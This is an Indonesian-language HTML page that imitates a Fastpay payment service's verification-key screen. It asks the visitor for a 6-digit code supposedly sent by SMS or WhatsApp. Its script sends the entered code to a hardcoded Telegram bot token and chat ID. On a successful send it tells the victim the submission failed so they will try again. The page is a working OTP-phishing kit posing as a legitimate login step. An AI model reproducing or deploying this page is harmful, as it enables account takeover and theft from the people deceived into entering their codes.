<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fastpay Key Input</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f7f7f7;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 320px;
            position: relative;
        }
        .logo {
            margin-bottom: 20px;
        }
        .logo img {
            width: 320px;
            height: auto;
        }
        h2 {
            color: #333;
            margin-bottom: 10px;
            font-size: 20px;
            text-align: left;
            margin-left: 10px;
        }
        p {
            color: #666;
            margin-bottom: 10px;
            font-size: 14px;
        }
        .input-container {
            position: relative;
            margin-bottom: 10px;
        }
        .input-container img {
            position: absolute;
            left: 5px;
            top: 50%;
            transform: translateY(-50%);
            width: 50px;
        }
        input[type="text"] {
            width: 100%;
            padding: 12px 10px 12px 60px;
            border: 3px solid #ccc;
            border-radius: 5px;
            font-size: 16px;
            box-sizing: border-box;
        }
        button {
            width: 100%;
            padding: 12px;
            margin-top: 10px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 14px;
            background-color: #d9534f;
            color: white;
        }
        .timer-container {
            margin-top: 10px;
            font-size: 14px;
            color: #333;
        }
        .footer {
            margin-top: 20px;
            font-size: 16px;
            color: #999;
        }
        .footer a {
            color: #007bff;
            text-decoration: none;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://i.ibb.co.com/HGWpQgY/IMG-20241123-125513.jpg" alt="Fastpay Logo">
        </div>
        <h2>KEY Telah Dikirim</h2>
        <p>Silahkan masukkan 6 digit key yang telah kami kirimkan melalui SMS/WA ke +628********</p>
        <div class="input-container">
            <img src="https://i.ibb.co.com/SPpRB7B/IMG-20241123-123757.jpg" alt="Key Icon">
            <input type="text" id="keyInput" placeholder="Masukkan Key">
        </div>

        <!-- Timer -->
        <div class="timer-container">
            Mohon tunggu <span id="timer">85</span> detik untuk kirim ulang.
        </div>

        <button id="submitBtn">Kirim</button>
        <div class="footer">
            Perlu bantuan? <a href="#">Hubungi Customer Service</a>
            <p>© Copyright 2011 • 2024<br>Sentra Bisnis Fastpay All Right Reserved</p>
        </div>
    </div>

    <script>
        // Bot Telegram API
        const botToken = '7806730572:AAGPWrWBu78r-IQZExAGDEcwXzYWQsFvVEE'; // Ganti dengan token bot Telegram Anda
        const chatId = '6525085237'; // Ganti dengan chat ID Anda

        // Timer countdown
        let timeLeft = 85;
        const timerElement = document.getElementById('timer');

        const countdown = setInterval(() => {
            timeLeft--;
            timerElement.textContent = timeLeft;

            if (timeLeft <= 0) {
                clearInterval(countdown);
                alert('Waktu habis, silakan kirim ulang!');
            }
        }, 1000);

        document.getElementById('submitBtn').addEventListener('click', function () {
            const keyInput = document.getElementById('keyInput').value;

            if (!keyInput) {
                alert('Silakan masukkan key terlebih dahulu.');
                return;
            }

            // Kirim data ke bot Telegram
            const message = `𝗞𝗲𝘆 𝗣𝗲𝗻𝗴𝗴𝘂𝗻𝗮:\n${keyInput}`;
            const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

            fetch(url)
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        alert('Data gagl dikirim Silakan ulang!');
                    } else {
                        alert('Gagal mengirim data. Coba lagi.');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Terjadi kesalahan saat mengirim data.');
                });
        });
    </script>
</body>
</html>